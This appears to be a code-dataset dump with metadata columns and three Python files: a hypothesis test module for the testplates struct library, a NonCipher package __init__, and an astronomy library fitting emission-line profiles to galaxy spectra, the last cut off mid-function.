| 34.809524 | 121 | 0.715382 | 1,649 | 13,158 | 5.223772 | 0.049727 | 0.09055 | 0.074878 | 0.094846 | 0.926747 | 0.884839 | 0.856977 | 0.839331 | 0.825401 | 0.772347 | 0 | 0.009815 | 0.210214 | 13,158 | 377 | 122 | 34.901857 | 0.819092 | 0.005016 | 0 | 0.792079 | 0 | 0 | 0.392421 | 0.149373 | 0 | 0 | 0 | 0 | 0.165017 | 1 | 0.033003 | false | 0 | 0.009901 | 0 | 0.049505 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
2749b13d547dd68da8191f62ac4d18ddc8edc2d9 | 3,634 | py | Python | tests/test_base/test_mapping.py | kprzybyla/testplates | 156a373d9a0818c6074ec8d622d6ef1f867eafd3 | [
"MIT"
] | null | null | null | tests/test_base/test_mapping.py | kprzybyla/testplates | 156a373d9a0818c6074ec8d622d6ef1f867eafd3 | [
"MIT"
] | null | null | null | tests/test_base/test_mapping.py | kprzybyla/testplates | 156a373d9a0818c6074ec8d622d6ef1f867eafd3 | [
"MIT"
] | null | null | null | from typing import Final
from resultful import unwrap_success
from hypothesis import (
given,
strategies as st,
)
from testplates import (
struct,
init,
field,
passthrough_validator,
MISSING,
)
KEY: Final[str] = "key"
# noinspection PyTypeChecker
@given(value=st.integers())
def test_value_access_in_required_field(value: int) -> None:
@struct
class Template:
key = field()
validator = unwrap_success(passthrough_validator())
assert Template.key.name == KEY
assert Template.key.default == MISSING
assert Template.key.validator is validator
assert Template.key.is_optional is False
assert (result := init(Template, key=value))
template = unwrap_success(result)
assert template.key == value
assert template[KEY] == value
# noinspection PyTypeChecker
@given(value=st.integers(), default=st.integers())
def test_value_access_in_required_field_with_default_value(value: int, default: int) -> None:
@struct
class Template:
key = field(default=default)
validator = unwrap_success(passthrough_validator())
assert Template.key.name == KEY
assert Template.key.default == default
assert Template.key.validator is validator
assert Template.key.is_optional is False
assert (result_value := init(Template, key=value))
assert (result_default := init(Template))
template_value = unwrap_success(result_value)
template_default = unwrap_success(result_default)
assert template_value.key == value
assert template_value[KEY] == value
assert template_default.key == default
assert template_default[KEY] == default
# noinspection PyTypeChecker
@given(value=st.integers())
def test_value_access_in_optional_field(value: int) -> None:
@struct
class Template:
key = field(optional=True)
validator = unwrap_success(passthrough_validator())
assert Template.key.name == KEY
assert Template.key.default == MISSING
assert Template.key.validator is validator
assert Template.key.is_optional is True
assert (result := init(Template, key=value))
template = unwrap_success(result)
assert template.key == value
assert template[KEY] == value
# noinspection PyTypeChecker
@given(value=st.integers(), default=st.integers())
def test_value_access_in_optional_field_with_default_value(value: int, default: int) -> None:
@struct
class Template:
key = field(default=default, optional=True)
validator = unwrap_success(passthrough_validator())
assert Template.key.name == KEY
assert Template.key.default == default
assert Template.key.validator is validator
assert Template.key.is_optional is True
assert (result_value := init(Template, key=value))
assert (result_default := init(Template))
template_value = unwrap_success(result_value)
template_default = unwrap_success(result_default)
assert template_value.key == value
assert template_value[KEY] == value
assert template_default.key == default
assert template_default[KEY] == default
# noinspection PyTypeChecker
@given(value=st.integers())
def test_len(value: int) -> None:
@struct
class Template:
key = field()
assert (result := init(Template, key=value))
template = unwrap_success(result)
assert len(template) == 1
# noinspection PyTypeChecker
@given(value=st.integers())
def test_iter(value: int) -> None:
@struct
class Template:
key = field()
assert (result := init(Template, key=value))
template = unwrap_success(result)
assert list(iter(template)) == [KEY]
| 26.143885 | 93 | 0.713814 | 436 | 3,634 | 5.788991 | 0.107798 | 0.143819 | 0.134707 | 0.082409 | 0.918384 | 0.918384 | 0.918384 | 0.918384 | 0.897781 | 0.850238 | 0 | 0.000339 | 0.188222 | 3,634 | 138 | 94 | 26.333333 | 0.855254 | 0.044304 | 0 | 0.734043 | 0 | 0 | 0.000866 | 0 | 0 | 0 | 0 | 0 | 0.404255 | 1 | 0.06383 | false | 0.053191 | 0.042553 | 0 | 0.234043 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 9 |
27af93ffb27ef5803406f96a507fe854815f489c | 181 | py | Python | NonCipher/__init__.py | NotStatilko/NonCipher | e3ba53328ffae039e24b7d4b646649b713383313 | [
"Apache-2.0"
] | 7 | 2019-06-04T19:08:19.000Z | 2019-11-07T17:00:24.000Z | NonCipher/__init__.py | NotStatilko/NonCipher | e3ba53328ffae039e24b7d4b646649b713383313 | [
"Apache-2.0"
] | 6 | 2019-06-03T18:30:46.000Z | 2021-05-02T21:45:16.000Z | NonCipher/__init__.py | NotStatilko/NonCipher | e3ba53328ffae039e24b7d4b646649b713383313 | [
"Apache-2.0"
] | null | null | null | from NonCipher.NonCipher import NonCipher
from NonCipher.NonCipher import get_hash_of
from NonCipher.NonCipher import TRY_TO_DECRYPT
from NonCipher.NonCipher import __version__
| 36.2 | 47 | 0.867403 | 24 | 181 | 6.208333 | 0.416667 | 0.348993 | 0.590604 | 0.751678 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.110497 | 181 | 4 | 48 | 45.25 | 0.925466 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
fd961f1b1a794ef2d561e0a90795ed5d37c06214 | 49,598 | py | Python | galaxy/python/LineFittingLibrary.py | AndresSixtos/pyeBOSS | 4750908c8bc409633bef8f790133e3a1f3f0c9e4 | [
"CC0-1.0"
] | 1 | 2017-05-23T13:03:27.000Z | 2017-05-23T13:03:27.000Z | galaxy/python/LineFittingLibrary.py | AndresSixtos/pyeBOSS | 4750908c8bc409633bef8f790133e3a1f3f0c9e4 | [
"CC0-1.0"
] | null | null | null | galaxy/python/LineFittingLibrary.py | AndresSixtos/pyeBOSS | 4750908c8bc409633bef8f790133e3a1f3f0c9e4 | [
"CC0-1.0"
] | 2 | 2017-09-26T11:17:30.000Z | 2021-09-14T06:09:18.000Z | """
.. class:: LineFittingLibrary
.. moduleauthor:: Johan Comparat <johan.comparat__at__gmail.com>
This class contains a variety of function to fit emission or absorption lines in galaxy spectra.
"""
from scipy.optimize import curve_fit
import numpy as n
import matplotlib
matplotlib.use('pdf')
import matplotlib.pyplot as p
from scipy.interpolate import interp1d
from scipy.integrate import quad
# Location of the emission lines of interest:
import astropy.constants as cc
c=cc.c.value # speed of light
#from lineList import *
class LineFittingLibrary:
"""
Loads the environement proper to fit lines :
* Gaussian line model
* Lorentzian line model
* pseudoVoigt line model
* conversion magnitude AB to flux : flambda to fnu
:param dV: the default value (def: -9999.99)
"""
def __init__(self,dV=-9999.99):
self.dV=dV # default value put in the catalogs
# Line models
self.gaussianLine=lambda aa,sigma,F0,a0,continu : continu + F0*(n.e**( -(aa-a0)**2. / (2.*sigma**2.)))/ (abs(sigma)*(2.*n.pi)**0.5)
self.gaussianLineNC=lambda aa,sigma,F0,a0 : F0*(n.e**(-(aa-a0)**2./ (2.*sigma**2.) ))/(abs(sigma)*(2.*n.pi)**0.5)
self.lorentzLine=lambda aa,gamma,F0,a0,continu : continu + F0 * abs(gamma) / (n.pi* ((aa-a0)**2 +gamma**2))
self.pseudoVoigtLine=lambda aa,fwhm,F0,a0,continu,sh : continu + F0*abs(sh)/(1+ ((aa-a0) /(fwhm/2.))**2.)+F0*(1-abs(sh))*n.e**( -n.log(2)* ((aa-a0)/(fwhm/2.))**2.)
# conversion magnitude flux
self.fnu = lambda mAB : 10**(-(mAB+48.6)/2.5) # erg/cm2/s/Hz
self.flambda= lambda mAB, ll : 10**10 * c * self.fnu(mAB) / ll**2. # erg/cm2/s/A
def integrateMAG(self,wl,spec1d,err1d,filt,xmin=5000.,xmax=7500.):
"""
Integrates a spectrum over a filter curve.
:param wl: wavelength (array)
:param spec1d: flux, f lambda convention (array)
:param err1d: flux error (array)
:param filt: filter curve (interpolation 1d)
:param xmin: lower integration boundary (Angstrom)
:param xmax: higher integration boundary (Angstrom)
returns :
* integral of filter curve
* integral of spec1d
* integral of spec1d * filter curve
* integral of (spec1d + err1d) * filter curve
* integral of (spec1d - err1d) * filter curve
"""
filtTp=filt(wl)
Lfilt=quad(filt,xmin,xmax,limit=500000)[0]
toInt=interp1d(wl,spec1d)
Lspec=quad(toInt,xmin,xmax,limit=500000)[0]
toInt=interp1d(wl,spec1d*filtTp)
Lg=quad(toInt,xmin,xmax,limit=500000)[0]
toInt=interp1d(wl,(spec1d+err1d)*filtTp)
LgU=quad(toInt,xmin,xmax,limit=500000)[0]
toInt=interp1d(wl,(spec1d-err1d)*filtTp)
LgL=quad(toInt,xmin,xmax,limit=500000)[0]
return Lfilt, Lspec, Lg, LgU, LgL
def getFractionObsMed(self,mag,lambdaMag,fl,flErr):
"""
Computes the fraction of light captured by the spectrograph in a broad band by comparing the median flux in the broad band to the magnitude converted to flux at the mean wavelength of the broad band.
:param mag: magnitude AB (float, mag)
:param lambdaMag: mean wavelength covered by the magnitude AB (float, Angstrom)
:param fl: flux observed in the broad band (array, f lambda)
:param flErr: error on the flux observed in the broad band (array, f lambda)
Returns :
* fraction of light observed
* error on the fraction of light observed
"""
goal=self.flambda(mag,lambdaMag)
fo=goal/n.median(fl)
fo_err=goal/n.median(flErr)
return fo, fo_err
def getFractionObsMag(self,mag,lambdaMag,filter,xmin,xmax,wl,fl,flErr):
"""
Computes the fraction of light captured by the spectrograph in a broad band by comparing the integrated flux in the broad band to the magnitude.
:param mag: magnitude AB (float, mag)
:param lambdaMag: mean wavelength covered by the magnitude AB (float, Angstrom)
:param fl: flux observed in the broad band (array, f lambda)
:param flErr: error on the flux observed in the broad band (array, f lambda)
:param filt: filter curve (interpolation 1d)
:param xmin: lower integration boundary (Angstrom)
:param xmax: higher integration boundary (Angstrom)
Returns :
* fraction of light observed
* error on the fraction of light observed
"""
goal=self.flambda(mag,lambdaMag)
Lfilt, Lspec, Lg, LgU, LgL=self.integrateMAG(wl,fl,flErr,filter,xmin,xmax)
fo=Lg/Lfilt/goal
fo_err=(LgU/Lfilt/goal-LgL/Lfilt/goal)/2
return fo, fo_err
def plotLineFit(self,wl,fl,flErr,lineModel,a0,datI,path_to_fig="plot.pdf", title=" - ", fitWidth = 70., DLC=50, doublet=False):
"""
Plots a spectrum and the emission line model fitted.
:param wl: wavelength (array, Angstrom)
:param fl: flux observed in the broad band (array, f lambda)
:param flErr: error on the flux observed in the broad band (array, f lambda)
:param lineModel: model output by the line fitting functions (array, (2,N) wavelength and flux)
:param a0: position of the peak of the line
:param path_to_fig: where you wish to save the figure
"""
p.figure(0,(8,4))
p.plot(wl,fl,'k')
p.plot(wl,fl+flErr,'g--')
p.plot(wl,fl-flErr,'g--')
p.axvline(a0, c='k')
p.axvline(a0 - fitWidth/2., c='k')
p.axvline(a0 - fitWidth/2. - DLC, c='k')
p.axvline(a0 + fitWidth/2., c='k')
p.axvline(a0 + fitWidth/2. + DLC, c='k')
p.plot(lineModel[0], lineModel[1],'r')
p.xlim((a0 - fitWidth/2. - DLC - 5, a0 + fitWidth/2. + DLC + 5))
p.yscale('log')
p.ylim((n.max([lineModel[1].min() / 5., 1e-18]), lineModel[1].max() * 5.))
x_model = n.arange(a0 - fitWidth/2. - DLC, a0 + fitWidth/2. + DLC, 0.1)
if doublet:
a0_0, a0_1, flux, fluxErr, sigma, sigmaErr, continu, continuErr, EW, share, shareErr, fd_a0_l, fd_a0_r, chi2, ndof= datI
y_model_1 = continu/2. +self.gaussianLineNC( x_model, sigma, share*flux, a0_1)
y_model_2 = continu/2. + self.gaussianLineNC(x_model, sigma, (1-share) * flux, a0_0)
p.title(title+" doublet")
p.plot(x_model, y_model_1, 'c', ls='dashed', lw=2)
p.plot(x_model, y_model_2, 'm', ls='dotted', lw=2)
#p.plot(x_model, y_model_1 + y_model_2, '')
else:
a0,flux,fluxErr,sigma,sigmaErr,continu,continuErr,EW,fd_a0_l,fd_a0_r,chi2,ndof = datI
y_model = self.gaussianLine(x_model, sigma, flux, a0, continu)
p.title(title)
p.plot(x_model, y_model, 'm--')
#p.savefig(path_to_fig)
p.show()
def fit_Line_position_C0noise(self,wl,spec1d,err1d,a0=5007.,lineName="AL",fitWidth=20,DLC=20, p0_sigma=15.,p0_flux=8e-17,p0_share=0.5,continuumSide="left",model="gaussian"):
"""
fits a line profile to a spectrum where the error model is takes the value of the continuum.
:param wl: wavelength (array, Angstrom)
:param spec1d: flux observed in the broad band (array, f lambda)
:param err1d: error on the flux observed in the broad band (array, f lambda)
:param a0: expected position of the peak of the line in the observed frame (redshifted). a0 is fitted.
:param lineName: suffix characterizing the line in the headers of the output
:param fitWidth: width in Angstrom around the line where the fit is performed, default 20 Angstrom
:param continuumSide: "left" = bluewards of the line or "right" = redwards of the line
:param DLC: wavelength extent to fit the continuum around the line. (def: 230 Angstrom)
:param p0_sigma: prior on the line width in A (def: 15 A)
:param p0_flux: prior on the line flux in erg/cm2/s/A (def: 8e-17)
:param p0_share: prior on the share of Gaussian and Lorentzian model. Only used if the line is fitted with a pseudoVoigt profile width (def: 0.5 no units)
:param model: line model to be fitted : "gaussian", "lorentz" or "pseudoVoigt".
Returns :
* array 1 with the parameters of the model
* array 2 with the model (wavelength, flux model)
* header corresponding to the array 1
"""
header=" "+lineName+"_a0 "+lineName+"_flux "+lineName+"_fluxErr "+lineName+"_sigma "+lineName+"_sigmaErr "+lineName+"_continu "+lineName+"_continuErr "+lineName+"_EW "+lineName+"_fd_a0_l "+lineName+"_fd_a0_r "+lineName+"_chi2 "+lineName+"_ndof"
headerPV=" "+lineName+"_a0 "+lineName+"_flux "+lineName+"_fluxErr "+lineName+"_sigma "+lineName+"_sigmaErr "+lineName+"_continu "+lineName+"_continuErr "+lineName+"_EW "+lineName+"_share "+lineName+"_shareErr "+lineName+"_fd_a0_l "+lineName+"_fd_a0_r "+lineName+"_chi2 "+lineName+"_ndof"
outPutNF=n.array([a0, self.dV,self.dV,self.dV, self.dV,self.dV,self.dV,self.dV,self.dV,self.dV,self.dV,self.dV])
outPutNF_PV=n.array([a0, self.dV,self.dV,self.dV, self.dV,self.dV,self.dV,self.dV,self.dV,self.dV,self.dV,self.dV,self.dV,self.dV])
modNF=n.array([self.dV,self.dV])
if continuumSide=="left":
domainLine=(wl>a0-fitWidth)&(wl<a0+fitWidth)
domainCont=(wl>a0-DLC-fitWidth)&(wl<a0-fitWidth)
if a0<wl.max()-DLC and a0>wl.min()+fitWidth and a0<wl.max()-fitWidth and len(domainLine.nonzero()[0])>2 and len(domainCont.nonzero()[0])>2 :
continu=n.median(spec1d[domainCont])
continuErr=n.median(err1d[domainCont])
if model=="gaussian":
flMod=lambda aa,sigma,F0,a0,continu : self.gaussianLine(aa,sigma,F0,a0,continu)
p0=n.array([p0_sigma,p0_flux,a0,continu])
if model=="lorentz":
flMod=lambda aa,sigma,F0,a0,continu : self.lorentzLine(aa,sigma,F0,a0,continu)
p0=n.array([p0_sigma,p0_flux, a0,continu])
if model=="pseudoVoigt":
flMod=lambda aa,sigma,F0,sh,a0,continu : self.pseudoVoigtLine(aa,sigma,F0,a0,continu,sh)
p0=n.array([p0_sigma,p0_flux,p0_share,a0,continu])
interp=interp1d(wl,spec1d)
fd_a0_r=interp(a0+0.2)
fd_a0_l=interp(a0-0.2)
if fd_a0_r>continu and fd_a0_l>continu :
out = curve_fit(flMod, wl[domainLine], spec1d[domainLine], p0=p0,sigma=continu*n.ones_like(err1d[domainLine]),maxfev=1000000000, gtol=1.49012e-8)
if out[1].__class__==n.ndarray and ( model=="gaussian" or model=="lorentz") :
model1=flMod(wl[domainLine],out[0][0],out[0][1],out[0][2],out[0][3])
var=continu*n.ones_like(err1d[domainLine])
chi2=n.sum(abs(model1-spec1d[domainLine])**2./var**2.)
ndof=len(var)
sigma=out[0][0]
sigmaErr=out[1][0][0]**0.5
flux=out[0][1]
fluxErr=out[1][1][1]**0.5
a0=out[0][2]
a0_err=out[1][2][2]**0.5
continu=out[0][3]
continuErr=out[1][3][3]**0.5
EW=flux/continu
outPut=n.array([a0,flux,fluxErr,sigma,sigmaErr,continu,continuErr,EW,fd_a0_l,fd_a0_r,chi2,ndof ])
mod=n.array([wl[domainLine],model1])
return outPut,mod,header
elif model=="gaussian" or model=="lorentz" :
return n.array([a0,self.dV,self.dV,self.dV, self.dV,continu,continuErr,self.dV,fd_a0_l,fd_a0_r,self.dV,self.dV ]),modNF,header
elif out[1].__class__==n.ndarray and model=="pseudoVoigt" :
model1=flMod(wl[domainLine],out[0][0],out[0][1],out[0][2],out[0][3],out[0][4])
var=continu*n.ones_like(err1d[domainLine])
chi2=n.sum(abs(model1-spec1d[domainLine])**2./var**2.)
ndof=len(var)
sigma=out[0][0]
sigmaErr=out[1][0][0]**0.5
flux=out[0][1]
fluxErr=out[1][1][1]**0.5
share=out[0][2]
shareErr=out[1][2][2]**0.5
a0=out[0][3]
a0_err=out[1][3][3]**0.5
continu=out[0][4]
continuErr=out[1][4][4]**0.5
EW=flux/continu
outPut=n.array([a0,flux,fluxErr,sigma,sigmaErr,continu,continuErr,EW,share,shareErr,fd_a0_l,fd_a0_r,chi2,ndof])
mod=n.array([wl[domainLine],model1])
return outPut,mod,headerPV
else :
return n.array([a0,self.dV,self.dV,self.dV,self.dV,continu,continuErr,self.dV,self.dV,self.dV,fd_a0_l,fd_a0_r,self.dV,self.dV]),modNF,headerPV
else :
if model=="gaussian" or model=="lorentz" :
return n.array([a0,self.dV,self.dV,self.dV, self.dV,continu,continuErr,self.dV,fd_a0_l,fd_a0_r,self.dV,self.dV ]),modNF,header
if model=="pseudoVoigt" :
return n.array([a0,self.dV,self.dV,self.dV,self.dV,continu,continuErr,self.dV,self.dV,self.dV,fd_a0_l,fd_a0_r,self.dV,self.dV]),modNF,headerPV
else :
#print "not enough space to fit the line"
if model=="gaussian" or model=="lorentz" :
return outPutNF,modNF,header
if model=="pseudoVoigt" :
return outPutNF_PV,modNF,headerPV
elif continuumSide=="right" :
domainLine=(wl>a0-fitWidth)&(wl<a0+fitWidth)
domainCont=(wl>a0+fitWidth)&(wl<a0+DLC+fitWidth)
if a0<wl.max()-DLC and a0>wl.min()+fitWidth and a0<wl.max()-fitWidth and len(domainLine.nonzero()[0])>2 and len(domainCont.nonzero()[0])>2 :
continu=n.median(spec1d[domainCont])
continuErr=n.median(err1d[domainCont])
if model=="gaussian":
flMod=lambda aa,sigma,F0,a0,continu : self.gaussianLine(aa,sigma,F0,a0,continu)
p0=n.array([p0_sigma,p0_flux,a0,continu])
if model=="lorentz":
flMod=lambda aa,sigma,F0,a0,continu : self.lorentzLine(aa,sigma,F0,a0,continu)
p0=n.array([p0_sigma,p0_flux, a0,continu])
if model=="pseudoVoigt":
flMod=lambda aa,sigma,F0,sh,a0,continu : self.pseudoVoigtLine(aa,sigma,F0,a0,continu,sh)
p0=n.array([p0_sigma,p0_flux,p0_share,a0,continu])
interp=interp1d(wl,spec1d)
fd_a0_r=interp(a0+0.2)
fd_a0_l=interp(a0-0.2)
if fd_a0_r>continu and fd_a0_l>continu :
out = curve_fit(flMod, wl[domainLine], spec1d[domainLine], p0=p0,sigma=continu*n.ones_like(err1d[domainLine]),maxfev=1000000000, gtol=1.49012e-8)
if out[1].__class__==n.ndarray and ( model=="gaussian" or model=="lorentz") :
model1=flMod(wl[domainLine],out[0][0],out[0][1],out[0][2],out[0][3])
var=continu*n.ones_like(err1d[domainLine])
chi2=n.sum(abs(model1-spec1d[domainLine])**2./var**2.)
ndof=len(var)
sigma=out[0][0]
sigmaErr=out[1][0][0]**0.5
flux=out[0][1]
fluxErr=out[1][1][1]**0.5
a0=out[0][2]
a0_err=out[1][2][2]**0.5
continu=out[0][3]
continuErr=out[1][3][3]**0.5
EW=flux/continu
outPut=n.array([a0,flux,fluxErr,sigma,sigmaErr,continu,continuErr,EW,fd_a0_l,fd_a0_r,chi2,ndof ])
mod=n.array([wl[domainLine],model1])
return outPut,mod,header
elif model=="gaussian" or model=="lorentz" :
return n.array([a0,self.dV,self.dV,self.dV, self.dV,continu,continuErr,self.dV,fd_a0_l,fd_a0_r,self.dV,self.dV ]),modNF,header
elif out[1].__class__==n.ndarray and model=="pseudoVoigt" :
model1=flMod(wl[domainLine],out[0][0],out[0][1],out[0][2],out[0][3],out[0][4])
var=continu*n.ones_like(err1d[domainLine])
chi2=n.sum(abs(model1-spec1d[domainLine])**2./var**2.)
ndof=len(var)
sigma=out[0][0]
sigmaErr=out[1][0][0]**0.5
flux=out[0][1]
fluxErr=out[1][1][1]**0.5
share=out[0][2]
shareErr=out[1][2][2]**0.5
a0=out[0][3]
a0_err=out[1][3][3]**0.5
continu=out[0][4]
continuErr=out[1][4][4]**0.5
EW=flux/continu
outPut=n.array([a0,flux,fluxErr,sigma,sigmaErr,continu,continuErr,EW,share,shareErr,fd_a0_l,fd_a0_r,chi2,ndof])
mod=n.array([wl[domainLine],model1])
return outPut,mod,headerPV
else :
return n.array([a0,self.dV,self.dV,self.dV,self.dV,continu,continuErr,self.dV,self.dV,self.dV,fd_a0_l,fd_a0_r,self.dV,self.dV]),modNF,headerPV
else :
if model=="gaussian" or model=="lorentz" :
return n.array([a0,self.dV,self.dV,self.dV, self.dV,continu,continuErr,self.dV,fd_a0_l,fd_a0_r,self.dV,self.dV ]),modNF,header
if model=="pseudoVoigt" :
return n.array([a0,self.dV,self.dV,self.dV,self.dV,continu,continuErr,self.dV,self.dV,self.dV,fd_a0_l,fd_a0_r,self.dV,self.dV]),modNF,headerPV
else :
#print "not enough space to fit the line"
if model=="gaussian" or model=="lorentz" :
return outPutNF,modNF,header
if model=="pseudoVoigt" :
return outPutNF_PV,modNF,headerPV
def fit_Line_position(self,wl,spec1d,err1d,a0=5007.,lineName="AL",fitWidth=20,DLC=20, p0_sigma=15.,p0_flux=8e-17,p0_share=0.5,continuumSide="left",model="gaussian"):
"""
fits a line profile to a spectrum around a fixed line position
:param wl: wavelength (array, Angstrom)
:param spec1d: flux observed in the broad band (array, f lambda)
:param err1d: error on the flux observed in the broad band (array, f lambda)
:param a0: expected position of the peak of the line in the observed frame (redshifted). a0 is not fitted, it is given.
:param lineName: suffix characterizing the line in the headers of the output
:param DLC: wavelength extent to fit the continuum around the line. (def: 230 Angstrom)
:param p0_sigma: prior on the line width in A (def: 15 A)
:param p0_flux: prior on the line flux in erg/cm2/s/A (def: 8e-17)
:param p0_share: prior on the share of Gaussian and Lorentzian model. Only used if the line is fitted with a pseudoVoigt profile width (def: 0.5 no units)
:param continuumSide: "left" = bluewards of the line or "right" = redwards of the line
:param model: line model to be fitted : "gaussian", "lorentz" or "pseudoVoigt".
Returns :
* array 1 with the parameters of the model
* array 2 with the model (wavelength, flux model)
* header corresponding to the array 1
"""
header=" "+lineName+"_a0 "+lineName+"_flux "+lineName+"_fluxErr "+lineName+"_sigma "+lineName+"_sigmaErr "+lineName+"_continu "+lineName+"_continuErr "+lineName+"_EW "+lineName+"_fd_a0_l "+lineName+"_fd_a0_r "+lineName+"_chi2 "+lineName+"_ndof"
headerPV=" "+lineName+"_a0 "+lineName+"_flux "+lineName+"_fluxErr "+lineName+"_sigma "+lineName+"_sigmaErr "+lineName+"_continu "+lineName+"_continuErr "+lineName+"_EW "+lineName+"_share "+lineName+"_shareErr "+lineName+"_fd_a0_l "+lineName+"_fd_a0_r "+lineName+"_chi2 "+lineName+"_ndof"
outPutNF=n.array([a0, self.dV,self.dV,self.dV, self.dV,self.dV,self.dV,self.dV,self.dV,self.dV,self.dV,self.dV])
outPutNF_PV=n.array([a0, self.dV,self.dV,self.dV, self.dV,self.dV,self.dV,self.dV,self.dV,self.dV,self.dV,self.dV,self.dV,self.dV])
modNF=n.array([self.dV,self.dV])
if continuumSide=="left":
domainLine=(wl>a0-fitWidth)&(wl<a0+fitWidth)
domainCont=(wl>a0-DLC-fitWidth)&(wl<a0-fitWidth)
if a0<wl.max()-DLC and a0>wl.min()+fitWidth and a0<wl.max()-fitWidth and len(domainLine.nonzero()[0])>2 and len(domainCont.nonzero()[0])>2 :
continu=n.median(spec1d[domainCont])
continuErr=n.median(err1d[domainCont])
if model=="gaussian":
flMod=lambda aa,sigma,F0,a0,continu : self.gaussianLine(aa,sigma,F0,a0,continu)
p0=n.array([p0_sigma,p0_flux,a0,continu])
if model=="lorentz":
flMod=lambda aa,sigma,F0,a0,continu : self.lorentzLine(aa,sigma,F0,a0,continu)
p0=n.array([p0_sigma,p0_flux, a0,continu])
if model=="pseudoVoigt":
flMod=lambda aa,sigma,F0,sh,a0,continu : self.pseudoVoigtLine(aa,sigma,F0,a0,continu,sh)
p0=n.array([p0_sigma,p0_flux,p0_share,a0,continu])
interp=interp1d(wl,spec1d)
fd_a0_r=interp(a0+0.2)
fd_a0_l=interp(a0-0.2)
if fd_a0_r>continu and fd_a0_l>continu :
out = curve_fit(flMod, wl[domainLine], spec1d[domainLine], p0=p0,sigma=err1d[domainLine],maxfev=1000000000, gtol=1.49012e-8)
if out[1].__class__==n.ndarray and ( model=="gaussian" or model=="lorentz") :
model1=flMod(wl[domainLine],out[0][0],out[0][1],out[0][2],out[0][3])
var=err1d[domainLine]
chi2=n.sum(abs(model1-spec1d[domainLine])**2./var**2.)
ndof=len(var)
sigma=out[0][0]
sigmaErr=out[1][0][0]**0.5
flux=out[0][1]
fluxErr=out[1][1][1]**0.5
a0=out[0][2]
a0_err=out[1][2][2]**0.5
continu=out[0][3]
continuErr=out[1][3][3]**0.5
EW=flux/continu
outPut=n.array([a0,flux,fluxErr,sigma,sigmaErr,continu,continuErr,EW,fd_a0_l,fd_a0_r,chi2,ndof ])
mod=n.array([wl[domainLine],model1])
return outPut,mod,header
elif model=="gaussian" or model=="lorentz" :
return n.array([a0,self.dV,self.dV,self.dV, self.dV,continu,continuErr,self.dV,fd_a0_l,fd_a0_r,self.dV,self.dV ]),modNF,header
elif out[1].__class__==n.ndarray and model=="pseudoVoigt" :
model1=flMod(wl[domainLine],out[0][0],out[0][1],out[0][2],out[0][3],out[0][4])
var=err1d[domainLine]
chi2=n.sum(abs(model1-spec1d[domainLine])**2./var**2.)
ndof=len(var)
sigma=out[0][0]
sigmaErr=out[1][0][0]**0.5
flux=out[0][1]
fluxErr=out[1][1][1]**0.5
share=out[0][2]
shareErr=out[1][2][2]**0.5
a0=out[0][3]
a0_err=out[1][3][3]**0.5
continu=out[0][4]
continuErr=out[1][4][4]**0.5
EW=flux/continu
outPut=n.array([a0,flux,fluxErr,sigma,sigmaErr,continu,continuErr,EW,share,shareErr,fd_a0_l,fd_a0_r,chi2,ndof])
mod=n.array([wl[domainLine],model1])
return outPut,mod,headerPV
else :
return n.array([a0,self.dV,self.dV,self.dV,self.dV,continu,continuErr,self.dV,self.dV,self.dV,fd_a0_l,fd_a0_r,self.dV,self.dV]),modNF,headerPV
else :
if model=="gaussian" or model=="lorentz" :
return n.array([a0,self.dV,self.dV,self.dV, self.dV,continu,continuErr,self.dV,fd_a0_l,fd_a0_r,self.dV,self.dV ]),modNF,header
if model=="pseudoVoigt" :
return n.array([a0,self.dV,self.dV,self.dV,self.dV,continu,continuErr,self.dV,self.dV,self.dV,fd_a0_l,fd_a0_r,self.dV,self.dV]),modNF,headerPV
else :
#print "not enough space to fit the line"
if model=="gaussian" or model=="lorentz" :
return outPutNF,modNF,header
if model=="pseudoVoigt" :
return outPutNF_PV,modNF,headerPV
elif continuumSide=="right" :
domainLine=(wl>a0-fitWidth)&(wl<a0+fitWidth)
domainCont=(wl>a0+fitWidth)&(wl<a0+DLC+fitWidth)
if a0<wl.max()-DLC and a0>wl.min()+fitWidth and a0<wl.max()-fitWidth and len(domainLine.nonzero()[0])>2 and len(domainCont.nonzero()[0])>2 :
continu=n.median(spec1d[domainCont])
continuErr=n.median(err1d[domainCont])
if model=="gaussian":
flMod=lambda aa,sigma,F0,a0,continu : self.gaussianLine(aa,sigma,F0,a0,continu)
p0=n.array([p0_sigma,p0_flux,a0,continu])
if model=="lorentz":
flMod=lambda aa,sigma,F0,a0,continu : self.lorentzLine(aa,sigma,F0,a0,continu)
p0=n.array([p0_sigma,p0_flux, a0,continu])
if model=="pseudoVoigt":
flMod=lambda aa,sigma,F0,sh,a0,continu : self.pseudoVoigtLine(aa,sigma,F0,a0,continu,sh)
p0=n.array([p0_sigma,p0_flux,p0_share,a0,continu])
interp=interp1d(wl,spec1d)
fd_a0_r=interp(a0+0.2)
fd_a0_l=interp(a0-0.2)
if fd_a0_r>continu and fd_a0_l>continu :
out = curve_fit(flMod, wl[domainLine], spec1d[domainLine], p0=p0,sigma=err1d[domainLine],maxfev=1000000000, gtol=1.49012e-8)
if out[1].__class__==n.ndarray and ( model=="gaussian" or model=="lorentz") :
model1=flMod(wl[domainLine],out[0][0],out[0][1],out[0][2],out[0][3])
var=err1d[domainLine]
chi2=n.sum(abs(model1-spec1d[domainLine])**2./var**2.)
ndof=len(var)
sigma=out[0][0]
sigmaErr=out[1][0][0]**0.5
flux=out[0][1]
fluxErr=out[1][1][1]**0.5
